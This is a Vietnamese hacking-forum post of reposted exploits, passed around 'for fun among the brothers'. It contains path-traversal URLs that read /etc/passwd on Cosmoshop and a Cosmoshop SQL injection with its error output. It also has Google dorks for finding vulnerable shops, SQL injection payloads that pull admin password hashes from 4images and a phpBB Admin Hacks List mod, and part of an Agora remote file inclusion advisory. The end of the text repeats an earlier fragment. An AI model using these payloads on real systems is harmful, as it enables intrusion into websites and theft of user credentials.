Author: kidbandes YIM: kidbandes2k email: kidbandes@gmail.com or kidbandes@msn.com Website: http://thetindung.tk - http://banmai.org Date: 11/3/2006 Góp vui cùng anh em số column tương ứng line184 >> 47,43,53 line188 >> 53,56, 60 line191 >> 48 line185 >> 86,43 line202 >> 84,91 line208 >> 48,57 line64 >> 53 line62 >>37 line67 >>48,53 line211 >> 43 line59 >> 70 line58 >> 37,43,57 line 60 >>47,48,49 ,53,50,56,60,85 line 57 >> 37,38,58 line 916 >>>37 line 930 >>37 line476 >>>47 line 47 >>30 line912 >>37 line467 >>47 line61 >>53 line53 >>34,35 line 467 > 47 line 468 > 47 line 469 > 48 line191 56 line184 47,43,53 line188 53,56 line191 48 line185 86,43 line202 84,91 line208 48,57 line64 53 line211,187 43 line59 70 line 467 >47 line465 47 line 468 > 47 line 469 > 48 line 876 >>43 Danchoivnn(vniss) [cosmoshop again]sql injection + view all files as admin user Trích: 1) show all files as admin-user 2) sql injection Cosmoshop - Lse (<= )V8.11.106 1) Show all files as an admin-user: /cgi-bin/admin/bestellvorgang/edit_mailtexte.cgi?file= / / / / / / / / /etc/passwd%00 /cgi-bin/admin/bestmail.cgi?action=view&file= / / / / / / /etc/pa sswd%00 2) SQL Injection cgi-bin/lshop.cgi?action=showdetail&artnum=10[' UNION SELECT OR OTHER SQL]&wkid=2002g&ls=d&nocache= get_artikel_from_db: Fehler bei SELECT artnum,artpreis,artzub,artbild,artmwst,artlayout,a rtangebot, artlieferzeit,artinaktiv,artrabattgruppe,special_p rice,artneu,artstaffel ,artpreis_ek,artdate,artbestand, artbestand_min,artbestand_ignore,artgewicht_netto, artgewicht_brutto,artn um2,artlieferant,artd_abverkauf, artd_lieferzeit,artlieferdatum,artpreiswunsch,arte bay,artnam,artdesc,art ausf_1,artausf_2 FROM shopartikel as a LEFT JOIN shopartikelcontent AS ac ON (a.artnum=ac.artnr AND ac.sprache ='d') WHERE 1 AND artnum='10'' < you enter here :You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''10''' at line 1 in sub: main::get_artikel_from_db (<FULL PATH HERE>/lib/lshopartikel_sql.pm, line 257) called by: main::get_artikel_content_by_id Keywords : V8.11.106 inurl:cgi-bin/lshop.cgi intitle:Cosmoshop or anything what u think Zeof(vniss) 4images 1.7.x SQL injection Code: Topic : SQL injection - 4images 1.7.x SecurityAlert Id : 1711 CVE : CVE-2006-5236 SecurityRisk : Medium Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : disfigure (disfigure gmail com) Date : 13.10.2006 Affected Software : 4images 1.7.x Advisory Text : /****************************************/ http://www.w4cking.com Product: 4images 1.7.x http://www.4homepages.de Vulnerability: SQL injection Notes: - SQL injection can be used to obtain password hash - for version 1.7.3, you must log in as a registered user POC: <target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%2 0 user_password%20from%204images_users%20where%20user_name=%2527AD MIN Black_hat_cr(HCE) Admin Hacks List v1.20 Remote SQL Injection Vulnerability Code: ################################################################## ###### # Admin Hacks List v1.20 Remote SQL Injection Vulnerability # # Download: http://www.nivisec.com # # Found By: the master # ################################################################## ###### # exploit: # # http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=- 99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,nu ll,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=Admin Hash # # Greetz: str0ke , Dr Max Virus ################################################################## ###### black_hat_cr(HCE) Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability [ECHO_ADV_59$2006]Agora 1.4 RC1 "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion Vulnerability Author : Dedi Dwianto a.k.a the_day Date Found : November, 01nd 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv59-theday-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Agora . artd_lieferzeit,artlieferdatum,artpreiswunsch,arte bay,artnam,artdesc,art ausf_1,artausf_2 FROM shopartikel as a LEFT JOIN shopartikelcontent AS ac ON (a.artnum=ac.artnr AND ac.sprache ='d') WHERE. ''10''' at line 1 in sub: main::get_artikel_from_db (<FULL PATH HERE>/lib/lshopartikel_sql.pm, line 257) called by: main::get_artikel_content_by_id Keywords : V8.11.106